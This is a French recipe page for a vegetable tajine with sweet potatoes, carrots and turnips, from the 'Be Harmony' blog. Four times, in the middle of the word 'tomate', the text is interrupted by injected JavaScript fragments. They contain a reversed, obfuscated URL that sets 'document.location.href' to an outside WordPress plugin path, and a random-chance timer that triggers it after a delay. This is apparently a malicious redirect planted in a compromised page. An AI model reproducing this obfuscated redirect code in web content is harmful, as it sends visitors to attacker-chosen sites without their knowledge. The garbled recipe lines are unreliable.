TAJINE DE PATATES DOUCES, CAROTTES & NAVETS

TAJINE DE PATATES DOUCES, CAROTTES & NAVETS

Un peu d’exotisme avec ce tajine de légumes qui propose légèreté et saveurs multiples. Un plat qui peut convenir à ceux qui ne mangent pas de viande, en remplaçant le bouillon de légumes à la place de celui de volaille !

Pour 4 Pers.

INGRÉDIENTS :

– 1 grosse patate douce coupée en gros cubes
– 4 carottes coupées en rondelles
– 2 navets coupés en petits cubes
– 1 oignon émincé
– 2 gousses d’ail hachées
– 1 CS de concentré de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomate
– 1 boîte de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomates concassées de 400g
– 400ml de bouillon de volaille maison ou en cube
– 2 CS de mélange d’épices marocaines
– 1 CS d’huile d’olive
– fleur de sel et poivre du moulin
– coriandre pour décorer

Faire revenir dans une cocotte avec 1 CS d’huile: l’ail, les oignons et les épices jusqu’à ce que le mélange embaume.


Rajouter les cubes de patates, les rondelles de carottes, le navet, le concentré de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomate et faire revenir pendant 2 minutes.


Ajouter les toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomates concassées et le bouillon. Assaisonner.


Porter à ébullition, baisser le feu au minimum et cuire à couvert pendant 1 heure environ. Les légumes doivent être tendres et il ne doit pas y avoir trop de liquide.


Parsemer de coriandre


Bon appétit
!

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LES RECETTES BE HARMONY


Be Harmony vous invite à retrouver l’ensemble de ses recettes sur son Blog “Idées Recettes” (lien ci-dessous)

Joanne Reichling, issue du parcours formation “Arts Culinaires” de l’école d’Alain DUCASSE, vous propose chaque semaine une recette originale qui vous permettra de vous adapter à votre rééquilibrage alimentaire.

Pour plus d’informations, vous pouvez consulter notre Site Internet et/ou vous rapprocher de votre harmonythérapeute.

A très bientôt !

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